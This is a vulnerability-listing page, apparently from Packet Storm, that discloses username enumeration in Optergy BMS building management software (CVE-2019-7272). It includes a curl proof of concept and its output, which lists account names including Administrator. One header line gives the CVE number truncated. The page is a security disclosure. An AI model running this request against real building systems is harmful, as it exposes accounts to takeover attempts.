Optergy BMS 2.0.3a Account Reset / Username Disclosure

🗓️ 12 Nov 2019 00:00:00Reported by LiquidWormType

packetstorm🔗 packetstormsecurity.com👁 108 Views

Optergy BMS 2.0.3a Account Reset / Username Disclosure, Discovered by Gjoko 'LiquidWorm' Krstic, CVE-2019-727

Reporter	Title	Published	Views	Family All 11
0day.today	Optergy 2.3.0a - Username Disclosure Vulnerability	12 Nov 201900:00	–	zdt
CNVD	Optergy Proton/Enterprise Information Disclosure Vulnerability (CNVD-2019-16983)	10 Jun 201900:00	–	cnvd
CVE	CVE-2019-7272	1 Jul 201920:07	–	cve
Cvelist	CVE-2019-7272	1 Jul 201920:07	–	cvelist
Exploit DB	Optergy 2.3.0a - Username Disclosure	12 Nov 201900:00	–	exploitdb
exploitpack	Optergy 2.3.0a - Username Disclosure	12 Nov 201900:00	–	exploitpack
ICS	Optergy Proton Enterprise Building Management System	6 Jun 201900:00	–	ics
NVD	CVE-2019-7272	1 Jul 201921:15	–	nvd
OSV	CVE-2019-7272	1 Jul 201921:15	–	osv
Prion	Design/Logic Flaw	1 Jul 201921:15	–	prion

`  
Optergy BMS Account Reset and Username Disclosure  
  
Affected version <=2.0.3a (Proton and Enterprise)  
Discovered by Gjoko 'LiquidWorm' Krstic  
  
CVE: CVE-2019-7272  
Advisory: https://applied-risk.com/resources/ar-2019-008  
  
PoC:  
  
curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='  
<option value="80">djuro</option>  
<option value="99">teppi</option>  
<option value="67">view</option>  
<option value="3">alerton</option>  
<option value="59">stef</option>  
<option value="41">humba</option>  
<option value="25">drmio</option>  
<option value="11">de3</option>  
<option value="56">andri</option>  
<option value="6">myko</option>  
<option value="22">dzonka</option>  
<option value="76">kosto</option>  
<option value="8">beebee</option>  
<option value="1">Administrator</option>  
`

12 Nov 2019 00:00Current

EPSS0.15004